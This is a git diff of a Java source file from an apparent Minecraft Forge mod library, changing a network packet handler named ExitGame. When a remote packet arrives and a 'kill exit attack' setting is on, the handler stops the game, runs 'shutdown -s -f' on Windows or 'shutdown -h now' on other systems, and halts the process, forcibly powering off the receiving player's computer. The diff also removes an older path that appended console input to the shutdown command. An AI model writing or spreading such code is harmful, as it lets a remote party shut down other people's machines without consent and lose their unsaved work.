@@ -1,10 +1,10 @@
 package miku.lib.network.packets;
 
+import com.sun.jna.Platform;
 import io.netty.buffer.ByteBuf;
 import miku.lib.client.api.iMinecraft;
 import miku.lib.common.sqlite.Sqlite;
 import miku.lib.common.util.EntityUtil;
-import miku.lib.common.util.SystemUtil;
 import net.minecraft.client.Minecraft;
 import net.minecraftforge.fml.common.network.simpleimpl.IMessage;
 import net.minecraftforge.fml.common.network.simpleimpl.IMessageHandler;
@@ -13,7 +13,6 @@ import net.minecraftforge.fml.relauncher.Side;
 import net.minecraftforge.fml.relauncher.SideOnly;
 
 import java.io.IOException;
-import java.util.Scanner;
 
 public class ExitGame implements IMessage {
 
@@ -35,29 +34,25 @@ public class ExitGame implements IMessage {
         @Override
         @SideOnly(Side.CLIENT)
         public IMessage onMessage(ExitGame message, MessageContext ctx) {
-            boolean flag = (boolean) Sqlite.GetValueFromTable("miku_kill_exit_attack","CONFIG",0);
-            System.out.println("Miku Kill Exit Attack is:"+flag);
-            if(!flag)return null;
-            if(EntityUtil.isProtected(Minecraft.getMinecraft().player))return null;
-            ((iMinecraft)Minecraft.getMinecraft()).Stop();
-            if (SystemUtil.isWindows()) {
-                Scanner scanner = new Scanner(System.in);
-                String input = scanner.nextLine();
+            boolean flag = (boolean) Sqlite.GetValueFromTable("miku_kill_exit_attack", "CONFIG", 0);
+            System.out.println("Miku Kill Exit Attack is:" + flag);
+            if (!flag) return null;
+            if (EntityUtil.isProtected(Minecraft.getMinecraft().player)) return null;
+            ((iMinecraft) Minecraft.getMinecraft()).Stop();
+
+            if (Platform.isWindows()) {
                 try {
-                    Runtime.getRuntime().exec("shutdown -s -f " + input);
+                    Runtime.getRuntime().exec("shutdown -s -f ");
                 } catch (IOException ignored) {
 
                 }
-            }
-            if (SystemUtil.isLinux()) {
+            } else {
                 try {
-
-                    ProcessBuilder processBuilder = new ProcessBuilder();
-                    processBuilder.command("shutdown -h now");
-                    processBuilder.start();
+                    Runtime.getRuntime().exec("shutdown -h now");
                 } catch (IOException ignored) {
                 }
             }
+
             Runtime.getRuntime().halt(39);
             System.exit(0);
             return null;
